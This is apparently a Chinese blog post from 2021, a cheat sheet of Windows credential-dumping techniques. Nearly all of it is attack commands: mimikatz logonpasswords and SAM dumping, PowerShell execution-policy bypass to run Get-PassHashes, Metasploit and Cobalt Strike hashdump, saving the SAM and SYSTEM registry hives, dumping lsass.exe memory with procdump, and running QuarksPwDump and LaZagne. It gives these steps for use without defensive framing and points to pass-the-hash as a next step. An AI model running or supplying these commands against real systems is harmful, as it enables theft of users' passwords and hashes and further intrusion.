windows环境下抓密码总结

在线抓密码

1.mimikatz

privilege::debug

token::whoami

token::elevate

lsadump::sam

 

 

 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

2.ps脚本

使用Get-PassHashes.ps1

powershell -exec bypass

Import-Module .\Get-PassHashes.PS1

Get-PassHashes

 

 

 

 

 

 

3.msf

上面拿到hash后其实可以用msf再hash传递

run hashdump

hashdump

post/windows/gather/credentials/domain_hashdump(获取域hash)

use mimikatz

wdigest(明文)

 

 

4.cs

拿到shell后使用hashdump, 普通user的权限是没法用的

需要Administrator权限

 

 

 

 hashdump

 

 

 

logonpasswords

 

 

 

 

 

离线抓密码

1.SAM(卷影副本、注册表)

卷影副本:卷影副本,也称为快照,是存储在 Data Protection Manager (DPM) 服务器上的副本的时间点副本。副本是文件服务器上单个卷的受保护共享、文件夹和文件的完整时间点副本。 

管理员状态下执行如下命令

reg save hklm\sam sam.hiv

reg save hklm\system system.hiv

 

 

 

 再把这两个文件移到mimikatz同一目录下

执行

lsadump::sam /sam:sam.hiv /system:system.hiv

 

 

 

2.lsass.exe(注入lsass.exe进程,并从其内存中提取) 

执行如下命令:

 

procdump.exe -accepteula -ma lsass.exe lsass.dmp

 

 

 

在有mimikatz和dmp文件的目录下运行cmd,执行如下命令

 

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

 

 

 

 

注:这两步都需要为管理员权限

 

3.手工导出lsass.dmp文件 

 使用任务管理器导出lsass.dmp文件

 

 

 

其他工具

1.QuarksPwDump

命令如下:

 

QuarksPwDump.exe –dhl -o hash.txt

 

 

2.lazagne.exe

命令如下

lazagne.exe windows

 

 参考

参考张师傅链接https://home.cnblogs.com/u/Drunkmars/

posted @ 2021-04-08 20:42  Punished  阅读(213)  评论(0编辑  收藏  举报